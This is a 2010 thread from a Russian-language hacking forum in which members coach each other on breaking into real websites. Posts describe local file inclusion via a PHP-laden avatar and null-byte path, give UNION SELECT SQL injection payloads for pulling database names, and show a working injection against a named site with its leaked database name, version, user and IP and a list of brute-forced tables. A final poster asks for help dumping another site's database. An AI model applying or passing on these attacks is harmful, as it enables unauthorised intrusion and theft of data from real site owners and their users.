 |
|
17.01.2010, 18:44
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами:
9567480
Репутация:
61
|
|
Сообщение от mailbrush
С внешних ресурсов не заинклудишь, т.к. есть префикс config, НО тебе крупно повезло, что есть phpBB форум. Зарегайся на нем, залей аватару с PHP-кодом, проинклудь её, PHP-код выполнится.
А какже префикс .php ?
И в phpBB папка /forum/images/avatars/ пуста, значит аватары скорее всего в БД = (
|
|
|
17.01.2010, 18:48
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами:
9223466
Репутация:
3171
|
|
Сообщение от Byrger
А какже префикс .php ?
И в phpBB папка /forum/images/avatars/ пуста, значит аватары скорее всего в БД = (
Ну в таком случае тебе не повезло.
А если все же в папке,то как то так: ../path_to_avata.gif%00
|
|
|
|
17.01.2010, 18:51
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами:
9567480
Репутация:
61
|
|
А точно в /images/avatars/ должны авы лежать?
Листинг каталогов открыт
|
|
|
|
17.01.2010, 18:52
|
|
Познающий
Регистрация: 10.08.2009
Сообщений: 30
С нами:
8816961
Репутация:
4
|
|
спасибо mailbrush , вроде понятно, а как узнать что БД выводит только первое значение записи?
и вот еще такой пример инъекции нашел
?id=14+and+0+union+select+1,2,3,4,5,6,7,8
как ее понимать??
|
|
|
|
17.01.2010, 20:21
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Сообщение от Gidz
спасибо mailbrush , вроде понятно, а как узнать что БД выводит только первое значение записи?
и вот еще такой пример инъекции нашел
?id=14+and+0+union+select+1,2,3,4,5,6,7,8
как ее понимать??
Если подобрал поля, но ни одно из них не выводится, вероятно всего - это именно тот случай. После подстановки "-", "and 1=0" все должно заработать.
|
|
|
|
18.01.2010, 00:19
|
|
Banned
Регистрация: 28.12.2009
Сообщений: 30
С нами:
8615506
Репутация:
0
|
|
есть скуля. получил имена таблиц. но они не работают. т.к. надо узнать имя БД. т.е. табла лежит в другой БД. как узнать имя БД?
|
|
|
|
18.01.2010, 00:38
|
|
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
С нами:
9129884
Репутация:
240
|
|
concat_ws(0x3a,table_schema,table_name,column_name )
|
|
|
|
18.01.2010, 00:57
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
С нами:
9898501
Репутация:
257
|
|
Сообщение от Серёжа393
есть скуля. получил имена таблиц. но они не работают. т.к. надо узнать имя БД. т.е. табла лежит в другой БД. как узнать имя БД?
union select 1,2,database(),4,5
3 - выводимая колонка.
|
|
|
|
18.01.2010, 04:02
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Код:
Если через тулзу:
http://www.akos-icco.ru/news.php?part=1+or+1=1+and+substring(version(),1,1)=4--+
database(): w_akos
version(): 4.1.20-1.gms
@@version_compile_os: pc-linux-gnu
user(): w_akos@195.42.160.50
Post-метод, настройки:
$bl_url = "http://www.akos-icco.ru/news.php?part=1+or+1=1";
$bl_filtr = "--+";
$bl_plus = "+";
$bl_error = "8 декабря 2008";
$bl_error_type = 1;
Скрипт сохранить в ANSI-формате
Brute tables
-------------
members
subscribe
news
articles
Дальше сам
Последний раз редактировалось Pashkela; 18.01.2010 в 04:07..
|
|
|
|
18.01.2010, 04:20
|
|
Познающий
Регистрация: 16.04.2009
Сообщений: 81
С нами:
8984365
Репутация:
45
|
|
В поис вставляем галочку site/list.aspx?q=' Получаем:
Server Error in '/' Application.
Invalid operator for data type. Operator equals modulo, type equals varchar.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
Exception Details: System.Data.SqlClient.SqlException: Invalid operator for data type. Operator equals modulo, type equals varchar.
Source Error:
Line 94: paramCollection.Add(new SqlParameter("@Keywords", keywords));
Line 95: paramCollection.Add(new SqlParameter("@StatusId", statusId));
Line 96: DataTable dt = Sql.ExecuteQuery("dt", "spCourse_Search", paramCollection);
Line 97: return dt;
Line 98: }
Source File: d:\websites\LocalUser\modernsalonlearningc\App_Cod e\Course.cs Line: 96
Stack Trace:
Дальше лабудень непонятная. Это что значит? уязвимость? Можно базу собрать? Просто с sql не знаком, если скажете что можно - буду читать, учить, пробовать. Очень база с сайта нужна.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
